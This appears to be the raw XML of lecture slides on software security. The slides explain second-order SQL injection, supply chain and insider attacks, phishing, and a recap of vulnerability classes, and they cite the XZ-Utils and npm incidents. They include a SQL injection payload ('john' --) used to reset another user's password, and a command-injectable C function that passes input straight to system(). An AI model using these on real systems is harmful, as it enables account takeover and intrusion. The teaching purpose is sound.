              <a:gd name="connsiteY7" fmla="*/ 1875211 h 2387001"/>
              <a:gd name="connsiteX8" fmla="*/ 808475 w 2316188"/>
              <a:gd name="connsiteY8" fmla="*/ 2384762 h 2387001"/>
              <a:gd name="connsiteX9" fmla="*/ 117440 w 2316188"/>
              <a:gd name="connsiteY9" fmla="*/ 2035755 h 2387001"/>
              <a:gd name="connsiteX10" fmla="*/ 12738 w 2316188"/>
              <a:gd name="connsiteY10" fmla="*/ 1442442 h 2387001"/>
              <a:gd name="connsiteX11" fmla="*/ 257043 w 2316188"/>
              <a:gd name="connsiteY11" fmla="*/ 1365660 h 2387001"/>
              <a:gd name="connsiteX12" fmla="*/ 494368 w 2316188"/>
              <a:gd name="connsiteY12" fmla="*/ 1512243 h 2387001"/>
              <a:gd name="connsiteX13" fmla="*/ 682832 w 2316188"/>
              <a:gd name="connsiteY13" fmla="*/ 1861251 h 2387001"/>
              <a:gd name="connsiteX14" fmla="*/ 1304066 w 2316188"/>
              <a:gd name="connsiteY14" fmla="*/ 1875211 h 2387001"/>
              <a:gd name="connsiteX15" fmla="*/ 2281287 w 2316188"/>
              <a:gd name="connsiteY15" fmla="*/ 1749568 h 23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16188" h="2387001">
                <a:moveTo>
                  <a:pt x="2316188" y="409379"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2107947" y="373315"/>
                  <a:pt x="1899706" y="337251"/>
                  <a:pt x="1708915" y="276756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1518124" y="216261"/>
                  <a:pt x="1384338" y="87129"/>
                  <a:pt x="1171443" y="46411"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="958548" y="5693"/>
                  <a:pt x="496695" y="-26880"/>
                  <a:pt x="431547" y="32451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366399" y="91782"/>
                  <a:pt x="594418" y="308167"/>
                  <a:pt x="780555" y="402399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="966692" y="496631"/>
                  <a:pt x="1437852" y="489651"/>
                  <a:pt x="1548371" y="597843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1658890" y="706035"/>
                  <a:pt x="1485550" y="838658"/>
                  <a:pt x="1443669" y="1051553"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1401788" y="1264448"/>
                  <a:pt x="1402952" y="1653010"/>
                  <a:pt x="1297086" y="1875211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191220" y="2097412"/>
                  <a:pt x="1005083" y="2358005"/>
                  <a:pt x="808475" y="2384762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="611867" y="2411519"/>
                  <a:pt x="250063" y="2192808"/>
                  <a:pt x="117440" y="2035755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15183" y="1878702"/>
                  <a:pt x="-10529" y="1554124"/>
                  <a:pt x="12738" y="1442442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36005" y="1330760"/>
                  <a:pt x="176771" y="1354027"/>
                  <a:pt x="257043" y="1365660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337315" y="1377293"/>
                  <a:pt x="423403" y="1429645"/>
                  <a:pt x="494368" y="1512243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="565333" y="1594841"/>
                  <a:pt x="547882" y="1800756"/>
                  <a:pt x="682832" y="1861251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="817782" y="1921746"/>
                  <a:pt x="1037657" y="1893825"/>
                  <a:pt x="1304066" y="1875211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570475" y="1856597"/>
                  <a:pt x="1925881" y="1803082"/>
                  <a:pt x="2281287" y="174956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4" name="Vrije vorm 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324018" y="2273203"/>
            <a:ext cx="1508349" cy="1385818"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 20941 w 1508349"/>
              <a:gd name="connsiteY0" fmla="*/ 337374 h 1385818"/>
              <a:gd name="connsiteX1" fmla="*/ 181484 w 1508349"/>
              <a:gd name="connsiteY1" fmla="*/ 23267 h 1385818"/>
              <a:gd name="connsiteX2" fmla="*/ 446730 w 1508349"/>
              <a:gd name="connsiteY2" fmla="*/ 23267 h 1385818"/>
              <a:gd name="connsiteX3" fmla="*/ 998162 w 1508349"/>
              <a:gd name="connsiteY3" fmla="*/ 30247 h 1385818"/>
              <a:gd name="connsiteX4" fmla="*/ 1319249 w 1508349"/>
              <a:gd name="connsiteY4" fmla="*/ 16287 h 1385818"/>
              <a:gd name="connsiteX5" fmla="*/ 1500733 w 1508349"/>
              <a:gd name="connsiteY5" fmla="*/ 120989 h 1385818"/>
              <a:gd name="connsiteX6" fmla="*/ 1472813 w 1508349"/>
              <a:gd name="connsiteY6" fmla="*/ 393215 h 1385818"/>
              <a:gd name="connsiteX7" fmla="*/ 1458852 w 1508349"/>
              <a:gd name="connsiteY7" fmla="*/ 916727 h 1385818"/>
              <a:gd name="connsiteX8" fmla="*/ 1095884 w 1508349"/>
              <a:gd name="connsiteY8" fmla="*/ 546779 h 1385818"/>
              <a:gd name="connsiteX9" fmla="*/ 1012122 w 1508349"/>
              <a:gd name="connsiteY9" fmla="*/ 923707 h 1385818"/>
              <a:gd name="connsiteX10" fmla="*/ 1319249 w 1508349"/>
              <a:gd name="connsiteY10" fmla="*/ 1119151 h 1385818"/>
              <a:gd name="connsiteX11" fmla="*/ 1207567 w 1508349"/>
              <a:gd name="connsiteY11" fmla="*/ 1335536 h 1385818"/>
              <a:gd name="connsiteX12" fmla="*/ 711976 w 1508349"/>
              <a:gd name="connsiteY12" fmla="*/ 1377417 h 1385818"/>
              <a:gd name="connsiteX13" fmla="*/ 544452 w 1508349"/>
              <a:gd name="connsiteY13" fmla="*/ 1209893 h 1385818"/>
              <a:gd name="connsiteX14" fmla="*/ 802718 w 1508349"/>
              <a:gd name="connsiteY14" fmla="*/ 923707 h 1385818"/>
              <a:gd name="connsiteX15" fmla="*/ 921380 w 1508349"/>
              <a:gd name="connsiteY15" fmla="*/ 784104 h 1385818"/>
              <a:gd name="connsiteX16" fmla="*/ 725936 w 1508349"/>
              <a:gd name="connsiteY16" fmla="*/ 658461 h 1385818"/>
              <a:gd name="connsiteX17" fmla="*/ 502571 w 1508349"/>
              <a:gd name="connsiteY17" fmla="*/ 819005 h 1385818"/>
              <a:gd name="connsiteX18" fmla="*/ 279206 w 1508349"/>
              <a:gd name="connsiteY18" fmla="*/ 916727 h 1385818"/>
              <a:gd name="connsiteX19" fmla="*/ 0 w 1508349"/>
              <a:gd name="connsiteY19" fmla="*/ 902766 h 13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8349" h="1385818">
                <a:moveTo>
                  <a:pt x="20941" y="337374"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="65730" y="206496"/>
                  <a:pt x="110519" y="75618"/>
                  <a:pt x="181484" y="23267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252449" y="-29084"/>
                  <a:pt x="446730" y="23267"/>
                  <a:pt x="446730" y="23267"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="998162" y="30247"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143582" y="29084"/>
                  <a:pt x="1235487" y="1163"/>
                  <a:pt x="1319249" y="16287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1403011" y="31411"/>
                  <a:pt x="1475139" y="58168"/>
                  <a:pt x="1500733" y="120989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1526327" y="183810"/>
                  <a:pt x="1479793" y="260592"/>
                  <a:pt x="1472813" y="393215"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1465833" y="525838"/>
                  <a:pt x="1521673" y="891133"/>
                  <a:pt x="1458852" y="916727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1396031" y="942321"/>
                  <a:pt x="1170339" y="545616"/>
                  <a:pt x="1095884" y="546779"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1021429" y="547942"/>
                  <a:pt x="974895" y="828312"/>
                  <a:pt x="1012122" y="923707"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1049349" y="1019102"/>
                  <a:pt x="1286675" y="1050513"/>
                  <a:pt x="1319249" y="1119151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1351823" y="1187789"/>
                  <a:pt x="1308779" y="1292492"/>
                  <a:pt x="1207567" y="1335536"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1106355" y="1378580"/>
                  <a:pt x="822495" y="1398357"/>
                  <a:pt x="711976" y="1377417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="601457" y="1356477"/>
                  <a:pt x="529328" y="1285511"/>
                  <a:pt x="544452" y="1209893"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="559576" y="1134275"/>
                  <a:pt x="739897" y="994672"/>
                  <a:pt x="802718" y="923707"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="865539" y="852742"/>
                  <a:pt x="934177" y="828312"/>
                  <a:pt x="921380" y="784104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="908583" y="739896"/>
                  <a:pt x="795737" y="652644"/>
                  <a:pt x="725936" y="658461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="656135" y="664278"/>
                  <a:pt x="577026" y="775961"/>
                  <a:pt x="502571" y="819005"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="428116" y="862049"/>
                  <a:pt x="362968" y="902767"/>
                  <a:pt x="279206" y="916727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195444" y="930687"/>
                  <a:pt x="97722" y="916726"/>
                  <a:pt x="0" y="902766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55" name="Rechthoek 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5354084" y="3712325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4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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> order SQL injection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Suppose I want to access John's account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 register an account for myself with the name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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john' -- 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 log in as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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john' -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>and change my password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>If the password change is done with the SQL statement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users                   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SET password='abcd1234'                                  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username='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john' --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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password='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nl-NL" sz="1800" dirty="0"/>
              <a:t>then I have reset John's password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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abcd1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>is user input, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the dangerous input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the server's own database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>where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was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>The moral of the story:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any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r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input, not even data coming from sources you think can trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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266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000" i="1" dirty="0"/>
              <a:t>Other attack vectors,  besides these input possibilities?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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15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3779912" y="4165459"/>
            <a:ext cx="2301933" cy="4156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sz="4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000" i="1" dirty="0"/>
              <a:t>Other attack vectors,  besides these input possibilities?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Drawing Figure with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC5BABA-1F8B-A366-902E-88F9C974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2417" y="1094752"/>
            <a:ext cx="1164808" cy="1164808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Graphic 10" descr="Drawing Figure with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{046CF36A-9F4F-4BB7-1463-E3E02477B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6524" y="4299668"/>
            <a:ext cx="1097061" cy="1097061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Drawing Figure with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86930180-597E-46B3-C440-87F4230FB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5793" y="2818003"/>
            <a:ext cx="1097061" cy="1097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A2B0C-64A4-0543-517F-1159BF235F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366928" y="505776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8925F-582D-8249-E929-952D511A7E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7303442" y="1955799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developer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AE4C0-E81F-9220-3A26-43438B07AD9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7301151" y="3459293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sys admin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A39FF-875C-3789-EE2B-A2D6E983DC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4100459" y="2097919"/>
            <a:ext cx="283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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>humans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4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dirty="0"/>
              <a:t>Other attack vectors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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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3923928" y="1988840"/>
            <a:ext cx="432048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Less obvious attack vectors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2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Supply chain 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Insider attacks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developers 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sys admin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Phishing to attack users, </a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-GB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using 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https://c0mpany.nl</a:t>
            </a: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32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B19E-313F-9B02-9E59-50C33402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vs Open Source code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386-8F1C-4597-DE0D-9E092964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Who thinks open source code is more secure                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>            than closed / proprietary code?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It depends... some open source is crappy, some closed source is great, and vice versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>More importantly, for most applications, the distinction is meaningless: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>most proprietary code relies on huge quantities of open source libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, Maven, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Pypi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Extra/bigger risk with open source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supply chain attacks</a:t>
            </a:r>
          </a:p>
          <a:p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48A6C-FE81-2CA4-9952-FEA838CAD5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18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465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Supply chain attacks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>MegaCart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>Solarwinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, ...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https://www.wired.com/story/magecart-amazon-cloud-hacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/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73" y="2989987"/>
            <a:ext cx="6045200" cy="958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32455" r="-127" b="-2360"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2565973" y="2314935"/>
            <a:ext cx="5720602" cy="7170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l="2368" t="2740" r="-2368" b="-2740"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521715" y="4088357"/>
            <a:ext cx="4248477" cy="1257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D73A5-0CD3-7D54-31B3-7CF4F14FF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12"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1015175"/>
            <a:ext cx="5868144" cy="13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Recap: security vulnerabilities so far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5800" y="1124745"/>
            <a:ext cx="7761288" cy="4968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Memory corruption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, incl.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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spatial:  buffer overrun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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>temporal: use-after free, double free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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL dereference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1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Format string attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2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Integer overflow </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="24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en-GB" sz="2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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS command injection  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>PREfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> exercise: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                      int execute( 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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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SA_Pre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(Tainted=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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SA_No</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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)] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) { return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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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TOCTOU / race conditions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Today: all other types of vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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18085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9782-E092-7190-7637-44F4D874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XZ-Utils supply chain attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(2024)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1376-C8B9-9697-AF5C-DAC72A1D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54772-6879-9D7E-93A7-641A6B75A2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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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2C130-F8E9-5EF9-0FA8-CD715DBD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7" t="25327" r="3022"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="354494" y="1117623"/>
            <a:ext cx="5585657" cy="1360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2FB92-3063-B9A3-6A26-078EB7B8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37" y="2731080"/>
            <a:ext cx="6984776" cy="1640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94800-C218-777B-B665-DEAAEF59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376" y="2599341"/>
            <a:ext cx="1966854" cy="437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A9A95-57F5-4E1E-5F10-D93B4D5687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48" t="7332" r="9214" b="10836"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4845833" y="1182972"/>
            <a:ext cx="1082175" cy="387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CC5E38-334C-0808-72AF-21F45FAD35DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361034" y="5767814"/>
            <a:ext cx="8496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https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="9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https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="9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https://www.wired.com/story/xz-backdoor-everything-you-need-to-know/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635F27-BF03-5206-37B6-C7C612050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48" y="4433339"/>
            <a:ext cx="5940152" cy="1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65E1-FA04-57D4-0A7E-F73B765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npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> supply chain attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(Sept 2025)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35F2-93AB-829D-EF2B-DC0C4CDE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0BA2E-3205-632C-FD85-0295E5C4DF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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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00272-00F0-CC23-53E7-2F1B212D5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64211"/>
            <a:ext cx="611590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FFA1-3125-B0B5-4B33-C5F2B6CB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4433-520B-466F-68A6-84A7965D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Upcoming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>PyPi</a:t>
            </a:r>
